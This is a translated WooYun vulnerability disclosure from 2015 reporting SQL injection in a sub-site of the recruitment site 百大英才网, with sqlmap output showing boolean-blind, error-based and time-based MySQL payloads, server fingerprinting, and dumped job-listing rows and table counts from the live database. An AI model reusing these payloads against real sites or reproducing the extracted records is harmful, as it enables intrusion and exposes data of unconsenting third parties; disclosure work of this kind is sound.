
Vulnerability summary

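Bug ID: wooyun-2015-0134235

Vulnerability title: An injection on a 百大英才网 sub-site leaks a large amount of database data

Vendor: 百大英才网

Reported by: me1ody

Submitted: 2015-08-17 12:14

Fixed: 2015-10-04 08:16

Made public: 2015-10-04 08:16

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 12

Status: Handed over to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org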


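Vulnerability details

Disclosure status:

2015-08-17: Details reported to the vendor; awaiting vendor handling
2015-08-20: CNCERT (National Internet Emergency Center) has not yet been able to contact the relevant organization; details disclosed only to the notifying bodies
2015-08-30: Details disclosed to core white hats and experts in related fields
2015-09-09: Details disclosed to regular white hats
2015-09-19: Details disclosed to intern white hats
2015-10-04: Details disclosed to the public

Brief description:

A large amount of recruitment information leaked

Detailed description:

Injection point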

http://**.**.**.**/e/searchcompany/?id=975046


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=975046' AND 8752=8752 AND 'jsKl'='jsKl
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=975046' AND (SELECT 6138 FROM(SELECT COUNT(*),CONCAT(0x71786b7671,(SELECT (ELT(6138=6138,1))),0x716b787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'nWub'='nWub
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: id=975046' AND (SELECT * FROM (SELECT(SLEEP(10)))ZqAD) AND 'dSzD'='dSzD
---
web server operating system: Linux Red Hat Enterprise 5 (Tikanga)
web application technology: Apache 2.2.3, PHP 5.2.17
back-end DBMS: MySQL 5.0
available databases [3]:
[*] information_schema
[*] test
[*] yjs
current database: 'yjs'
current user: 'bys@localhost'
Database: yjs
[187 tables]
Database: yjs
Table: phome_ecms_zhaopin
[9 entries]
+-----------+---------------+------------------------------------+-------------------------------------------+--------------------+-------+------------------------+
| webid | didian | qiye | title | guimo | xueli | email |
+-----------+---------------+------------------------------------+-------------------------------------------+--------------------+-------+------------------------+
| 前程无忧 | 北京-海淀区 | 北京智通仁和科技发展有限公司 | 连锁店销售 | \\?a0\\?a0150-500人| 大专 | baidajob@**.**.**.** |
| 前程无忧 | 北京-海淀区 | 北京智通仁和科技发展有限公司 | 外地分公司储备销售 | \\?a0\\?a0150-500人| 大专 | baidajob@**.**.**.** |
| 前程无忧 | 北京-海淀区 | 北京智通仁和科技发展有限公司 | 形象专卖店销售 | \\?a0\\?a0150-500人| 大专 | baidajob@**.**.**.** |
| 前程无忧 | 上海-浦东新区 | 宇达电脑(上海)有限公司 | 物料规划员 | \\?a0\\?a0150-500人| 大专 | baidajob@**.**.**.** |
| 前程无忧 | 上海-浦东新区 | 宇达电脑(上海)有限公司 | 软件工程师 | \\?a0\\?a0150-500人| 大专 | mason.zhang@**.**.**.** |
| 前程无忧 | 上海-浦东新区 | 宇达电脑(上海)有限公司 | 财务分析员 | \\?a0\\?a0150-500人| 本科 | judy.mu@**.**.**.** |
| 前程无忧 | 上海 | 北京海辉高科软件有限公司上海分公司 | 配置管理工程师 | \\?a0\\?a0500人以上| 本科 | baidajob@**.**.**.** |
| 前程无忧 | 上海 | 北京海辉高科软件有限公司上海分公司 | 招聘助理(实习生) | \\?a0\\?a0500人以上| 本科 | baidajob@**.**.**.** |
| 前程无忧 | 上海 | 北京海辉高科软件有限公司上海分公司 | IBM(TIM/TAM) Application Support Engineer | \\?a0\\?a0500人以上| 本科 | baidajob@**.**.**.** |
+-----------+---------------+------------------------------------+-------------------------------------------+--------------------+-------+------------------------+
Database: yjs
Table: phome_ecms_infotmp_zhaopin
[2 entries]
+-----------------+----------------------------------------------------------------------+----------+
| title | oldurl | username |
+-----------------+----------------------------------------------------------------------+----------+
| 行政文员 | http://**.**.**.**/beijing/行政 | liqing |
| planning leader | http://**.**.**.**/shanghai/PLANNING+LEADER_218769818250437.htm | liqing |
+-----------------+----------------------------------------------------------------------+----------+


I deleted some of the useless ones.

Proof of vulnerability:

+-----------------------------------+---------+
| Table | Entries |
+-----------------------------------+---------+
| phome_ecms_zhaopin | 917852 |
| phome_ecms_infotmp_zhaopin | 700799 |
| phome_ecms_zhaopin_data_2 | 636778 |
| phome_ecms_zhaopin_data_1 | 281133 |
| phome_ecms_zhaopin_doc | 48610 |
| phome_ecms_zhaopin_doc_data | 48610 |
| phome_enewsdolog | 41159 |
| phome_enewssearch | 28657 |
| phome_ecms_zhaopinhui | 13576 |
| phome_ecms_zhaopinhui_data_1 | 13576 |
| phome_ecms_xuanjianghui | 3678 |
| phome_ecms_xuanjianghui_data_1 | 3678 |
| phome_enewslog | 3676 |
| phome_ecms_news | 3630 |
| phome_ecms_news_data_1 | 3630 |
| phome_enewslinktmp | 2792 |
| phome_ecms_infotmp_zhaopinhui | 2223 |
| phome_ecms_infotmp_xuanjianghui | 1101 |
| phome_enewsfile | 485 |
| phome_enewspl | 361 |
| phome_enewspl_data_1 | 361 |
| phome_enewslink | 141 |
| phome_ecms_infotmp_news | 108 |
| phome_enewsinfoclass | 65 |
| phome_ecms_infoclass_zhaopin | 61 |
| phome_enewsf | 57 |
| phome_enewsbq | 29 |
| phome_enewskey | 29 |
| phome_enewsnewstemp | 28 |
| phome_enewsuser | 23 |
| phome_enewsuseradd | 23 |
| phome_enewsclass | 17 |
| phome_enewsbqtemp | 13 |
| phome_enewsmemberf | 12 |
| phome_enewslisttemp | 11 |
| phome_enewswriter | 11 |
| phome_enewsfeedbackf | 9 |
| phome_enewsclassadd | 8 |
| phome_enewsmember | 8 |
| phome_enewsmemberadd | 8 |
| phome_enewsshoppayfs | 6 |
| phome_enewstempvar | 6 |
| phome_enewsjstemp | 5 |
| phome_enewsnotcj | 5 |
| phome_enewsbqclass | 4 |
| phome_enewsdo | 4 |
| phome_enewslinkclass | 4 |
| phome_enewsmembergroup | 4 |
| phome_enewsmod | 4 |
| phome_enewsplayer | 4 |
| phome_enewsshopps | 4 |
| phome_enewstable | 4 |
| phome_enewsgroup | 3 |
| phome_enewspage | 3 |
| phome_enewspayapi | 3 |
| phome_enewspltemp | 3 |
| phome_enewstags | 3 |
| phome_enewsuserjs | 3 |
| phome_enewszt | 3 |
| phome_enewsztadd | 3 |
| phome_ecms_infoclass_news | 2 |
| phome_enewsadclass | 2 |
| phome_enewsadminstyle | 2 |
| phome_enewsclasstemp | 2 |
| phome_enewsmemberform | 2 |
| phome_enewsspacestyle | 2 |
| phome_enewssql | 2 |
| phome_enewstagsclass | 2 |
| phome_enewstagsdata | 2 |
| phome_enewsuserclass | 2 |
| phome_enewsvotetemp | 2 |
| phome_enewswapstyle | 2 |
| phome_enewsyh | 2 |
| phome_ecms_infoclass_xuanjianghui | 1 |
| phome_ecms_infoclass_zhaopinhui | 1 |
| phome_enewsfeedbackclass | 1 |
| phome_enewsgbookclass | 1 |
| phome_enewsloginfail | 1 |
| phome_enewspicclass | 1 |
| phome_enewsprinttemp | 1 |
| phome_enewspublic | 1 |
| phome_enewspubtemp | 1 |
| phome_enewsqmsg | 1 |
| phome_enewssearchtemp | 1 |
| phome_enewstempgroup | 1 |
| phome_enewsworkflow | 1 |
| phome_enewsztclass | 1 |
+-----------------------------------+---------+

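Fix:

You're the professionals.

Copyright notice: when reposting, please credit the source me1ody@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 11

Confirmed: 2015-08-20 08:15

Vendor reply:

No direct handling channel with the site's operator has been established yet; awaiting claim.

Latest status:

None yet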